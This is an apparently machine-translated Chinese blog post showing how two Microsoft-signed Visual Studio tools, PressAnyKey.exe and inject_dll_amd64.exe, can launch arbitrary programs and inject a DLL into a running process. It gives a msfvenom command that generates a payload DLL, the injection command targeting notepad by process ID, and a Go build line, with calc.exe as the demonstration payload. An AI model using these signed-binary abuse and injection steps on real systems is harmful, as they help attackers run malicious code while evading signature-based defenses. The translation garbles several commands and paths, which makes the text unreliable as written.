dll 签名

有趣的命令行系列又来了,这次带来了两个新命令,只有在安装visual studio ide时勾选了nodejs和python才可用。

第一个命令是Microsoft.NodejsTools.PressAnyKey.exe,默认目录在C:\ Program files(x86)\ Microsoft Visual Studio \ 2019 \ Community \ common 7 \ IDE \ Extensions \ Microsoft \ NodejsTools \ NodejsTools。当然,微软IDE下的工具都有微软的数字签名。

这个命令相对简单,默认语法是:

Microsoft.NodejsTools.PressAnyKey.exe师范大学& lt随机文件名& gt& ltexe & gt

你可以复制Microsoft.NodejsTools.PressAnyKey.exe并单独使用,就像我把它放在D盘上一样。

跑步计算器:Microsoft.NodejsTools.PressAnyKey.exe师范1 calc.exe

dll 签名

第二个命令是注入dll amd64.exe。当然,同一个目录下还有一个inject_dll_x86.exe。该目录位于

c:\ Program Files(x86)\ Microsoft Visual Studio \ 2019 \ Community \ common 7 \ IDE \ Extensions \ Microsoft \ Python \ Core \ debug py \ _ vendored \ pydevd \ pydevd _ attach _ to _ process

看名字就知道是用来做DLINJECT的,也是微软签的。让我们首先生成一个dll来执行计算器。我生成的是64位的。

msfvenom -a x64平台windows-p windows/x64/exec CMD = & # 34;calc.exe & # 34-f dll-o calc.dll

让我们来看看吧。

notepad.exe//Kill记事本程序。

记事本和任务列表|查找& # 34;notepad.exe & # 34//找到记事本进程的pid。

inject _ dll _ amd64 . exe 11904D:\ dll _ inject _ vs _ binaries \ calc 64 . dll

//calc64.dll是kali下生成的,我改了名字。11904是新启动的记事本的pid。

我也试过用其他进程的pid,但是用chome不行,用记事本可以。

当然,如果使用inject_dll_x86.exe,就需要使用32位的dll。最后附上一个如何用go语言写dllmain风格的dll代码。

编译方法是go build-LD flags & # 34;-s-w & # 34;-build mode = c-shared-o calc.dll 1 .

免责声明:本站所有文章内容,图片,视频等均是来源于用户投稿和互联网及文摘转载整编而成,不代表本站观点,不承担相关法律责任。其著作权各归其原作者或其出版社所有。如发现本站有涉嫌抄袭侵权/违法违规的内容,侵犯到您的权益,请在线联系站长,一经查实,本站将立刻删除。

发表回复

登录后才能评论